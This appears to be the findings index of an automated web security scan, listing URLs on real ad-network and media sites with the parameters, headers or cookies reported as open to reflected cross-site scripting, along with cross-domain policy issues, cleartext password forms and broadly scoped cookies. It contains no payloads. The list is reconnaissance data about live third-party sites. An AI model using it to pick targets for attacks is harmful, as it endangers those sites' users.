1.1. http://as.jivox.com/player/iabplayer.php [siteId parameter]
1.4. http://sports.yahoo.com/nba/news [REST URL parameter 1]
1.5. http://sports.yahoo.com/nba/news [REST URL parameter 2]
1.6. http://www.lijit.com/beacon [informer parameter]
1.8. http://www.twackle.com/fansided/General_Twackle_Widget [REST URL parameter 1]
3.2. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [tile parameter]
3.4. http://ad.doubleclick.net/pfadx/fansided_cim/ [secure parameter]
3.5. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php [ES cookie]
3.7. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]
3.8. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]
3.9. http://www22.glam.com/cTagsImgCmd.act [gname parameter]
4. Cross-site scripting (reflected)
4.1. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 2]
4.2. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 3]
4.4. http://a.collective-media.net/adj/cm.mtv/ent_010111 [sz parameter]
4.5. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [adurl parameter]
4.6. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [ai parameter]
4.7. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [client parameter]
4.8. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [num parameter]
4.9. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sig parameter]
4.10. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sz parameter]
4.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [adurl parameter]
4.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [ai parameter]
4.13. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [client parameter]
4.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [num parameter]
4.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sig parameter]
4.16. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sz parameter]
4.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_a parameter]
4.18. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_d parameter]
4.19. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_eo parameter]
4.20. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_et parameter]
4.21. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_o parameter]
4.22. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pm parameter]
4.23. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pn parameter]
4.24. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_s parameter]
4.25. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [redirect parameter]
4.26. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [sz parameter]
4.27. http://ad.doubleclick.net/adj/cm.mtv/ent_010111 [net parameter]
4.28. http://ad.doubleclick.net/adj/gm.kotaku/e3 [name of an arbitrarily supplied request parameter]
4.29. http://ad.doubleclick.net/adj/gm.kotaku/e3 [ptile parameter]
4.31. http://ad.doubleclick.net/adj/gm.kotaku/pax [ptile parameter]
4.32. http://ad.doubleclick.net/adj/gm.kotaku/pc [name of an arbitrarily supplied request parameter]
4.33. http://ad.doubleclick.net/adj/gm.kotaku/pc [ptile parameter]
4.34. http://ad.doubleclick.net/adj/oiq.rmx/ [click0 parameter]
4.35. http://ad.turn.com/server/pixel.htm [fpid parameter]
4.36. http://ad.turn.com/server/pixel.htm [sp parameter]
4.42. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
4.43. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
4.44. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]
4.45. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]
4.46. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]
4.47. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
4.48. http://admeld.adnxs.com/usersync [admeld_callback parameter]
4.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]
4.50. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]
4.51. http://adnxs.revsci.net/imp [Z parameter]
4.52. http://adnxs.revsci.net/imp [s parameter]
4.53. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]
4.54. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
4.55. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
4.56. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
4.57. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
4.58. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
4.59. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]
4.60. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]
4.61. http://api.bizographics.com/v1/profile.redirect [api_key parameter]
4.62. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
4.63. http://api.dimestore.com/viapi [id parameter]
4.64. http://api.mixpanel.com/track/ [callback parameter]
4.65. http://ar.voicefive.com/b/rc.pli [func parameter]
4.66. http://as.jivox.com/player/iabplayer.php [clickTagURL parameter]
4.67. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]
4.68. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]
4.69. http://as.jivox.com/player/jivox_ad_tags.php [adVideoURL parameter]
4.70. http://as.jivox.com/player/jivox_ad_tags.php [autoPlay parameter]
4.71. http://as.jivox.com/player/jivox_ad_tags.php [campaignId parameter]
4.72. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]
4.73. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]
4.74. http://as.jivox.com/player/jivox_ad_tags.php [iframeTag parameter]
4.75. http://as.jivox.com/player/jivox_ad_tags.php [jivoxBranded parameter]
4.76. http://as.jivox.com/player/jivox_ad_tags.php [maxAds parameter]
4.77. http://as.jivox.com/player/jivox_ad_tags.php [mouseAction parameter]
4.79. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]
4.80. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]
4.81. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]
4.82. http://as.jivox.com/player/jivox_ad_tags.php [pauseBetweenAds parameter]
4.83. http://as.jivox.com/player/jivox_ad_tags.php [r parameter]
4.84. http://as.jivox.com/player/jivox_ad_tags.php [reportingURL parameter]
4.85. http://as.jivox.com/player/jivox_ad_tags.php [restartOnUnmute parameter]
4.86. http://as.jivox.com/player/jivox_ad_tags.php [serverName parameter]
4.87. http://as.jivox.com/player/jivox_ad_tags.php [serverURL parameter]
4.88. http://as.jivox.com/player/jivox_ad_tags.php [siteId parameter]
4.89. http://as.jivox.com/player/jivox_ad_tags.php [t parameter]
4.90. http://as.jivox.com/player/jivox_ad_tags.php [volume parameter]
4.91. http://as.jivox.com/player/jivox_ad_tags.php [volumeInitAction parameter]
4.92. http://as.jivox.com/unit/jivox_unit_tags.php [campaignId parameter]
4.93. http://as.jivox.com/unit/jivox_unit_tags.php [creativeUnitType parameter]
4.94. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]
4.95. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]
4.96. http://as.jivox.com/unit/jivox_unit_tags.php [mouseAction parameter]
4.98. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]
4.99. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]
4.100. http://as.jivox.com/unit/jivox_unit_tags.php [siteId parameter]
4.101. http://b.scorecardresearch.com/beacon.js [c1 parameter]
4.102. http://b.scorecardresearch.com/beacon.js [c15 parameter]
4.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]
4.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]
4.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]
4.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]
4.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]
4.108. http://ct.buzzfeed.com/wd/UserWidget [or parameter]
4.109. http://ct.buzzfeed.com/wd/UserWidget [u parameter]
4.110. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]
4.111. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]
4.112. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]
4.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]
4.114. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]
4.115. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]
4.116. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]
4.117. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]
4.118. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]
4.119. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]
4.120. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]
4.124. http://digg.com/tools/diggthis.js [REST URL parameter 1]
4.125. http://digg.com/tools/diggthis.js [REST URL parameter 2]
4.126. http://event.adxpose.com/event.flow [uid parameter]
4.127. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 1]
4.128. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 2]
4.129. http://geo.gorillanation.com/geo.php [name of an arbitrarily supplied request parameter]
4.130. http://geo.gorillanation.com/geo.php [website_id parameter]
4.131. http://hollywoodcrush.mtv.com/favicon.ico [REST URL parameter 1]
4.132. http://ib.adnxs.com/ab [ccd parameter]
4.133. http://ib.adnxs.com/ptj [redir parameter]
4.134. http://idolator.com/ifb/audience-science.html [REST URL parameter 1]
4.154. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]
4.155. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]
4.156. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]
4.157. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]
4.158. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]
4.159. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]
4.160. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]
4.161. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]
4.172. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 1]
4.173. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 2]
4.174. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 3]
4.175. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 4]
4.176. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 5]
4.177. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 1]
4.178. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 2]
4.179. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 3]
4.180. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 4]
4.181. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 5]
4.194. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 1]
4.195. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 2]
4.196. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 3]
4.202. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpck parameter]
4.203. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpvc parameter]
4.205. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter]
4.206. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter]
4.207. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter]
4.208. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter]
4.209. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter]
4.210. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter]
4.211. http://js.revsci.net/gateway/gw.js [csid parameter]
4.212. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [REST URL parameter 2]
4.213. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [sz parameter]
4.214. http://kotaku.com/static/ad_iframe.php [rand parameter]
4.215. http://kotaku.com/static/ad_iframe.php [script_url parameter]
4.221. http://moviesblog.mtv.com/favicon.ico [REST URL parameter 1]
4.222. http://ox-d.sbnation.com/w/1.0/ajs [o parameter]
4.223. http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2 [callback parameter]
4.224. http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f [callback parameter]
4.225. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
4.226. http://s26.sitemeter.com/js/counter.asp [site parameter]
4.227. http://s26.sitemeter.com/js/counter.js [site parameter]
4.228. http://s46.sitemeter.com/js/counter.js [site parameter]
4.229. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
4.230. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
4.231. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
4.232. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]
4.233. http://thesouthern.com/app/port/bulkCommentCount.php [REST URL parameter 1]
4.234. http://thesouthern.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]
4.235. http://thesouthern.com/favicon.ico [REST URL parameter 1]
4.241. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]
4.242. http://um.simpli.fi/am_js.js [admeld_callback parameter]
4.243. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]
4.244. http://um.simpli.fi/am_match [admeld_callback parameter]
4.245. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]
4.246. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]
4.247. http://widgets.digg.com/buttons/count [url parameter]
4.248. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]
4.249. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]
4.250. http://www.lijit.com/delivery/fp [n parameter]
4.251. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]
4.252. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]
4.253. http://www.paperg.com/jsfb/embed.php [bid parameter]
4.254. http://www.tvfanatic.com/favicon.ico [REST URL parameter 1]
4.255. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]
4.256. http://www24a.glam.com/appdir/getscript.jsp [view parameter]
4.257. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]
4.259. http://adnxs.revsci.net/imp [Referer HTTP header]
4.260. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
4.261. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]
4.262. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
4.263. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
4.264. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]
4.265. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]
4.266. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]
4.267. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]
4.268. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
4.269. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
4.270. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]
4.271. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]
4.272. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
4.273. http://d.chango.com/collector/admeldpixel [_t cookie]
4.274. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [ZEDOIDA cookie]
4.275. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [ZEDOIDA cookie]
4.276. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie]
4.277. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie]
4.278. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js [ruid cookie]
4.279. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js [ruid cookie]
4.280. http://s26.sitemeter.com/js/counter.asp [IP cookie]
4.281. http://s26.sitemeter.com/js/counter.js [IP cookie]
4.282. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]
4.283. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]
4.284. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]
4.285. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]
5.1. http://altfarm.mediaplex.com/crossdomain.xml
5.2. http://d.xp1.ru4.com/crossdomain.xml
5.3. http://dg.specificclick.net/crossdomain.xml
5.4. http://load.exelator.com/crossdomain.xml
5.5. http://m.xp1.ru4.com/crossdomain.xml
5.6. http://matrix.hbo.com/crossdomain.xml
5.7. http://pix04.revsci.net/crossdomain.xml
5.8. http://secure-us.imrworldwide.com/crossdomain.xml
5.9. http://segment-pixel.invitemedia.com/crossdomain.xml
5.10. http://server.cpmstar.com/crossdomain.xml
5.11. http://tags.bluekai.com/crossdomain.xml
5.12. http://ad.wsod.com/crossdomain.xml
5.13. http://ads.adbrite.com/crossdomain.xml
5.14. http://my.yahoo.com/crossdomain.xml
5.15. http://s.media-imdb.com/crossdomain.xml
6. Silverlight cross-domain policy
6.1. http://matrix.hbo.com/clientaccesspolicy.xml
6.2. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
7. Cleartext submission of password
7.2. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
7.3. http://www.mavsmoneyball.com/fanposts
7.4. http://www.mavsmoneyball.com/mavericks-tickets
8.8. http://load.exelator.com/load/ [REST URL parameter 1]
8.9. http://pixel.quantserve.com/seg/r [REST URL parameter 1]
8.10. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
8.11. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
8.12. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]
8.13. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]
8.14. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 1]
8.15. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 2]
8.16. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 3]
8.17. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 1]
8.18. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 2]
8.19. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 3]
9.1. http://l.sharethis.com/pview
9.2. http://www.apture.com/js/apture.js
9.3. http://www.facebook.com/extern/login_status.php
9.4. http://www.google.com/recaptcha/api/challenge
11.1. http://b.scorecardresearch.com/r [d.c parameter]
11.2. http://r.nexac.com/e/getdata.xgi [ru parameter]
11.3. http://u.openx.net/w/1.0/sc [r parameter]
12. Cookie scoped to parent domain
12.1. http://api.twitter.com/1/FanSided/lists//statuses.json
12.2. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information
12.3. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif
12.4. http://a.tribalfusion.com/i.cid
12.5. http://a.tribalfusion.com/j.ad
12.7. http://ad.amgdgt.com/ads/
12.10. http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13
12.11. http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23
12.12. http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2
12.13. http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137
12.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
12.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
12.16. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
12.17. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
12.18. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
12.19. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
12.20. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
12.21. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7
12.22. http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34
12.23. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10
12.24. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11
12.25. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7
12.26. http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4
12.27. http://ad.doubleclick.net/adj/buz.idolator/content
12.28. http://ad.doubleclick.net/adj/cm.mtv/ent_010111
12.29. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
12.30. http://ad.doubleclick.net/adj/oiq.rmx/
12.31. http://ad.doubleclick.net/click
12.32. http://ad.turn.com/server/ads.js
12.33. http://ad.turn.com/server/pixel.htm
12.34. http://admeld.adnxs.com/usersync
12.35. http://admeld.lucidmedia.com/clicksense/admeld/match
12.36. http://adopt.imiclk.com/emb/q
12.37. http://ads.adbrite.com/adserver/vdi/742697
12.38. http://ads.revsci.net/adserver/ako
12.39. http://ak1.abmr.net/is/adopt.imiclk.com
12.40. http://ak1.abmr.net/is/tag.admeld.com
12.41. http://ak1.abmr.net/is/www.burstnet.com
12.42. http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1
12.43. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11
12.44. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php
12.45. http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php
12.46. http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php
12.47. http://api.bizographics.com/v1/profile.redirect
12.48. http://apr.lijit.com///www/delivery/ajs.php
12.49. http://ar.voicefive.com/b/recruitBeacon.pli
12.50. http://ar.voicefive.com/b/recruitBeacon.pli
12.51. http://ar.voicefive.com/b/wc_beacon.pli
12.52. http://ar.voicefive.com/bmx3/broker.pli
12.53. http://at.amgdgt.com/ads/
12.54. http://b.scorecardresearch.com/b
12.55. http://b.scorecardresearch.com/p
12.56. http://b.scorecardresearch.com/r
12.57. http://b.voicefive.com/b
12.58. http://b.voicefive.com/p
12.59. http://bh.contextweb.com/bh/rtset
12.60. http://bs.serving-sys.com/BurstingPipe/adServer.bs
12.61. http://bs.serving-sys.com/BurstingPipe/adServer.bs
12.62. http://ce.lijit.com/merge
12.63. http://cm.npc-lee.overture.com/js_1_0/
12.64. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830
12.65. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830
12.66. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
12.67. http://d.chango.com/collector/admeldpixel
12.68. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830
12.69. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830
12.71. http://d.xp1.ru4.com/meta
12.72. http://d.xp1.ru4.com/meta
12.73. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js
12.74. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js
12.75. http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js
12.76. http://d7.zedo.com/img/bh.gif
12.77. http://gdyn.nba.com/1.1/1.gif
12.78. http://glam.grapeshot.co.uk/main/redirect.cgi
12.81. http://ib.adnxs.com/getuid
12.82. http://ib.adnxs.com/getuidnb
12.83. http://ib.adnxs.com/mapuid
12.84. http://ib.adnxs.com/ptj
12.85. http://ib.adnxs.com/ptj
12.86. http://ib.adnxs.com/seg
12.87. http://image2.pubmatic.com/AdServer/Pug
12.88. http://img137.imageshack.us/img137/4291/d5zee1.jpg
12.89. http://img690.imageshack.us/img690/7868/umadbroz.jpg
12.90. http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png
12.91. http://imp.constantcontact.com/imp/cmp.jsp
12.92. http://js.revsci.net/gateway/gw.js
12.93. http://load.exelator.com/load/
12.94. http://m.adnxs.com/msftcookiehandler
12.95. http://m.xp1.ru4.com/meta
12.96. http://media.fastclick.net/w/tre
12.97. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif
12.101. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js
12.102. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js
12.103. http://p.brilig.com/contact/bct
12.104. http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js
12.105. http://pix04.revsci.net/D10889/a1/0/3/0.gif
12.106. http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js
12.107. http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js
12.108. http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js
12.109. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif
12.110. http://pix04.revsci.net/G07610/b3/0/3/noscript.gif
12.111. http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js
12.112. http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js
12.113. http://pixel.invitemedia.com/data_sync
12.114. http://pixel.quantserve.com/pixel
12.115. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
12.116. http://pixel.rubiconproject.com/di.php
12.117. http://pixel.rubiconproject.com/tap.php
12.118. http://r.openx.net/set
12.119. http://r.turn.com/r/bd
12.120. http://r.turn.com/r/beacon
12.121. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/
12.122. http://rs.gwallet.com/r1/pixel/x420r9190030
12.123. http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583
12.124. http://segments.adap.tv/data/
12.125. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221
12.126. http://services.krxd.net/geoip
12.127. http://services.krxd.net/pixel.gif
12.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.129. http://sis.amazon.com/iu
12.130. http://srv.clickfuse.com/pixels/delete.php
12.131. http://stgapi.choicestream.com/instr/csanywhere.js
12.132. http://sync.adap.tv/sync
12.133. http://sync.mathtag.com/sync
12.134. http://syndication.mmismm.com/tntwo.php
12.135. http://t.flux.com/tracking.gif
12.136. http://t.invitemedia.com/track_imp
12.137. http://tags.bluekai.com/site/2312
12.138. http://tags.bluekai.com/site/2731
12.139. http://tags.bluekai.com/site/2736
12.140. http://tags.bluekai.com/site/3113
12.141. http://tags.bluekai.com/site/353
12.142. http://tap.rubiconproject.com/oz/feeds/targus/profile
12.143. http://tap.rubiconproject.com/oz/sensor
12.144. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js
12.145. http://tiger.vizu.com/a.gif
12.146. http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530
12.148. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp
12.149. http://u.openx.net/w/1.0/sc
12.150. http://vap3den1.lijit.com/www/delivery/lg.php
12.151. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979
12.152. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058
12.153. http://vt.imiclk.com/cgi/vtc.cgi
12.154. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp
12.155. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx
12.156. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp
12.157. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
12.158. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp
12.161. http://www.expedia.com/hotel.h892034.Hotel-Information
12.162. http://www.imdb.com/title/tt0944947/
12.163. http://www.lijit.com/beacon
